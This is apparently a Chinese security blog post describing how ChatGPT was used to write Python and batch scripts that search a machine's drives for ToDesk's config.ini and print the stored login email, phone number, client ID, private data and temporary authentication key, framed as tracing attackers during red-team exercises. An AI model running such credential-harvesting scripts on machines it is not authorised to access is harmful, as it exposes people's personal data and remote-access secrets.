ChatGPT編寫Todesk溯源自動化腳本
VSole2023-04-03 09:10:26
前言
在攻防演練中,通常會出現溯源反制的場景,我們這里假設已經連上了黑客的服務器,并且發現黑客的電腦中使用 了ToDesk的遠程桌面軟件,如果你自己的電腦中也安裝了ToDesk,可以看到在ToDesk目錄下會有一個config.ini文件
該文件中記錄了很多有趣的信息,其中包含
downloadtimes 下載Todesk的時間updatePassTime 最近一次使用時間Version Todesk版本號clientid 客戶端IDLoginPhone 手機號LoginEmail 郵箱賬戶
使用ChatGPT編寫自動化腳本
Python腳本
我們可以使用ChatGPT,幫助我們提取上述關鍵信息
然后看看ChatGPT的杰作吧
ToDesk.py代碼如下:
# -*- coding: utf-8 -*-import configparser
config_file = "C:/Program Files/ToDesk/config.ini"
config = configparser.ConfigParser()config.read(config_file)
# 提取需要的配置項download_times = config.get("ConfigInfo", "downloadtimes")version = config.get("ConfigInfo", "Version")client_id = config.get("ConfigInfo", "clientId")temp_auth_pass_ex = config.get("ConfigInfo", "tempAuthPassEx")resolution = config.get("ConfigInfo", "Resolution")update_pass_time = config.get("ConfigInfo", "updatePassTime")private_data = config.get("ConfigInfo", "PrivateData")login_phone = config.get("ConfigInfo", "LoginPhone")login_email = config.get("ConfigInfo", "LoginEmail")
# 輸出結果print("*********** Todesk溯源小助手 ***********")print(f"電子郵件賬戶:{login_email}")print(f"手機號:{login_phone}")print(f"下載時間:{download_times}")print(f"最近一次使用ToDesk時間:{update_pass_time}")print(f"當前屏幕尺寸:{resolution}")print(f"Todesk版本號:{version}")print(f"客戶端ID:{client_id}")print(f"私密數據:{private_data}")print(f"臨時認證密鑰:{temp_auth_pass_ex}")print("*********** 公眾號:豬豬安全 ***********")
運行效果如下
bat腳本
Todesk.bat代碼如下:
@echo off
set "config_file=C:\Program Files\ToDesk\config.ini"
for /f "tokens=1,2 delims==" %%a in ('findstr /i /c:"downloadtimes=" /c:"Version=" /c:"clientId=" /c:"tempAuthPassEx=" /c:"Resolution=" /c:"updatePassTime=" /c:"PrivateData=" /c:"LoginPhone=" /c:"LoginEmail=" "%config_file%"') do ( if "%%a" == "downloadtimes" set "download_times=%%b" if "%%a" == "Version" set "version=%%b" if "%%a" == "clientId" set "client_id=%%b" if "%%a" == "tempAuthPassEx" set "temp_auth_pass_ex=%%b" if "%%a" == "Resolution" set "resolution=%%b" if "%%a" == "updatePassTime" set "update_pass_time=%%b" if "%%a" == "PrivateData" set "private_data=%%b" if "%%a" == "LoginPhone" set "login_phone=%%b" if "%%a" == "LoginEmail" set "login_email=%%b")
echo *********** Todesk溯源小助手 ***********echo 電子郵件賬戶:%login_email%echo 手機號:%login_phone%echo 下載時間:%download_times%echo 最近一次使用ToDesk時間:%update_pass_time%echo 當前屏幕尺寸:%resolution%echo Todesk版本號:%version%echo 客戶端ID:%client_id%echo 私密數據:%private_data%echo 臨時認證密鑰:%temp_auth_pass_ex%echo *********** 公眾號:豬豬安全 ***********
pause
在cmd中運行或者直接打開都可以
優化代碼
但是上面的代碼,我們可以發現一個問題,那就是config.ini文件路徑是寫死的,那如果不是在系統默認C盤路徑下,則代碼無法進行自動化收集相關資料,因此,我們需要進一步優化,添加搜索的功能,在搜索到之后在進行自動化信息收集。
Python代碼
我們繼續詢問ChatGPT
我們這里粘貼完整的代碼
ToDesk.py
# -*- coding: utf-8 -*-import osimport configparser
target_filename = 'config.ini'target_strings = ['ToDesk']
# 定義需要搜索的盤符drive_letters = ['C', 'D', 'E', 'F', 'G']
for drive_letter in drive_letters: drive_path = f"{drive_letter}:\\" for dirpath, dirnames, filenames in os.walk(drive_path): if target_filename in filenames and all(s in dirpath for s in target_strings): config_path = os.path.join(dirpath, target_filename) # 找到 config.ini 文件 print(f"找到配置文件:{config_path}")
# 使用 ConfigParser 解析配置文件 config = configparser.ConfigParser() config.read(config_path)
# 提取相關信息 download_times = config.get('ConfigInfo', 'downloadtimes') version = config.get('ConfigInfo', 'Version') client_id = config.get('ConfigInfo', 'clientId') temp_auth_pass = config.get('ConfigInfo', 'tempAuthPassEx') resolution = config.get('ConfigInfo', 'Resolution') update_pass_time = config.get('ConfigInfo', 'updatePassTime') private_data = config.get('ConfigInfo', 'PrivateData') login_phone = config.get('ConfigInfo', 'LoginPhone') login_email = config.get('ConfigInfo', 'LoginEmail')
# 輸出提取的信息 print("*********** Todesk溯源小助手 ***********") print(f"電子郵件賬戶:{login_email}") print(f"手機號:{login_phone}") print(f"下載時間:{download_times}") print(f"最近一次使用ToDesk時間:{update_pass_time}") print(f"當前屏幕尺寸:{resolution}") print(f"Todesk版本號:{version}") print(f"客戶端ID:{client_id}") print(f"私密數據:{private_data}") print(f"臨時認證密鑰:{temp_auth_pass}") print("*********** 公眾號:豬豬安全 ***********")
# 找到配置文件后退出搜索 quit()
可以發現已經自動搜索配置文件的路徑,并且在搜索到配置文件后再進行提取!
bat代碼
ToDesk.bat
@echo offsetlocal EnableDelayedExpansion
set SEARCH_DRIVE=C D E F Gset SEARCH_PATH=Program Files
set VERSION=set CLIENT_ID=set AUTH_PASS=set RESOLUTION=set UPDATE_TIME=set PRIVATE_DATA=set EMAIL=set PHONE=set DOWNLOAD_TIME=
set "INI_FILE=config.ini"
echo Searching for ToDesk configuration file...
for %%d in (%SEARCH_DRIVE%) do ( for /f "tokens=*" %%p in ('dir /s /b "%%d:\%SEARCH_PATH%" 2^>nul ^| findstr /i /c:"ToDesk"') do ( if exist "%%p\%INI_FILE%" ( echo Found ToDesk configuration file at: "%%p\%INI_FILE%"
set "CONFIG_FILE=%%p\%INI_FILE%"
for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"version="') do set "VERSION=%%j" for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"clientId="') do set "CLIENT_ID=%%j" for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"tempAuthPassEx="') do set "AUTH_PASS=%%j" for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"Resolution="') do set "RESOLUTION=%%j" for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"updatePassTime="') do set "UPDATE_TIME=%%j" for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"PrivateData="') do set "PRIVATE_DATA=%%j" for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"LoginEmail="') do set "EMAIL=%%j" for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"LoginPhone="') do set "PHONE=%%j" for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"downloadtimes="') do set "DOWNLOAD_TIME=%%j"
goto :info_found ) ))
echo ToDesk configuration file not found.goto :end
:info_foundecho.echo *********** Todesk溯源小助手 ***********echo 電子郵件賬戶:%EMAIL%echo 手機號:%PHONE%echo 下載時間:%DOWNLOAD_TIME%echo 最近一次使用ToDesk時間:%UPDATE_TIME%echo 當前屏幕尺寸:%RESOLUTION%echo Todesk版本號:%VERSION%echo 客戶端ID:%CLIENT_ID%echo 私密數據:%PRIVATE_DATA%echo 臨時認證密鑰:%AUTH_PASS%echo *********** 公眾號:豬豬安全 ***********
pause
VSole
網絡安全專家